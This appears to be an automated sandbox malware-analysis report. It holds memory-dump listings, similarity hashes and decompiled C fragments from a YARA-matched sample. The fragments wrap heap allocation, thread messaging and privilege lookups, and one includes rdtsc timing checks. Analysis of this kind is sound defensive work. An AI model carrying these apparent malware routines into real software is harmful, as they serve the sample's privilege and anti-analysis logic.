Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0090F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090F90E

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0090FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FADB

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0090FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FAF3

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0090FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FBC3

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0090FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FB73

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0090FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FC9B

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0090FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FC6B

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0090FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FD9A

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0090FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FDCB

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0090FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FEAB

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0090FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FEDB

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0090FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FFBF

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088C0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E10(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407020( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CE0( &_v284, 0x104);
						E0041A350( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407050( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088cb
0x004088d3
0x004088d5
0x004088da
0x004088df
0x004088f2
0x004088f7
0x00408900
0x0040890c
0x0040891f
0x00408924
0x00408927
0x00408930
0x00408942
0x00408947
0x0040894c
0x00000000
0x00000000
0x0040894e
0x00408952
0x00000000
0x00000000
0x00408954
0x00000000
0x00408952
0x00408956
0x00408959
0x0040895f
0x00408961
0x0040896c
0x00408971
0x00408974
0x00408981
0x0040898c
0x0040898e
0x00408994
0x00408998
0x0040899b
0x0040899b
0x004089a2
0x004089a5
0x004089aa
0x004089b7
0x004088e6
0x004088e6
0x004088e6

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004184D2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Strings

E|@D, xrefs: 00418572, 0041857F
&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: &5A$E|@D
API String ID: 2488874121-550280695
Opcode ID: 0367c8d342e88fd9ba9933fa1d49eeb5b09fc2e90e989010ad222f07976358cb
Instruction ID: ee231a67b168f54dd097e22b53975b3c859fe52f879d27a026025444c8f7a049
Opcode Fuzzy Hash: 0367c8d342e88fd9ba9933fa1d49eeb5b09fc2e90e989010ad222f07976358cb
Instruction Fuzzy Hash: 80214BB1204209BBCB14DF99DC80EEB77ADAF88354F158659FA0997281C630E815CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004184b7
0x004184c2
0x004184cd
0x004184d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD

Strings

&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407270
0x0040727f
0x00407283
0x0040728e
0x0040729e
0x004072ae
0x004072b3
0x004072ba
0x004072bd
0x004072ca
0x004072cc
0x004072ce
0x004072eb
0x004072eb
0x00000000
0x004072ed
0x004072f2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418635, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00418635(void* __eax, signed int __ecx, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t14;
				signed int _t21;

				_t21 =  *(__edi - 0x79621d78) * 0x33;
				asm("loopne 0xffffffed");
				 *(__eax - 0x741374ab) =  *(__eax - 0x741374ab) | __ecx;
				_t11 = _a4;
				_push(_t21);
				E00418DD0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t14;
			}

0x00418635
0x0041863c
0x0041863e
0x00418643
0x0041864c
0x0041865a
0x00418670
0x00418674

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 836fe350d49a48aa1679d24aa072864264aa9f4a0eb2ecadeee33430556b8474
Instruction ID: ef3c193f1c99f02b6f843f1b88d91caad773e01557da090b7a0fb82e91f00062
Opcode Fuzzy Hash: 836fe350d49a48aa1679d24aa072864264aa9f4a0eb2ecadeee33430556b8474
Instruction Fuzzy Hash: AEF0A7B51042546BDB10EB65AC45DE77F5CDF81260F1146AEF8885B141C534A85487B4

Uniqueness

Uniqueness Score: -1.00%

Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184ef
0x004184f7
0x0041850d
0x00418511

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041865a
0x00418670
0x00418674

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
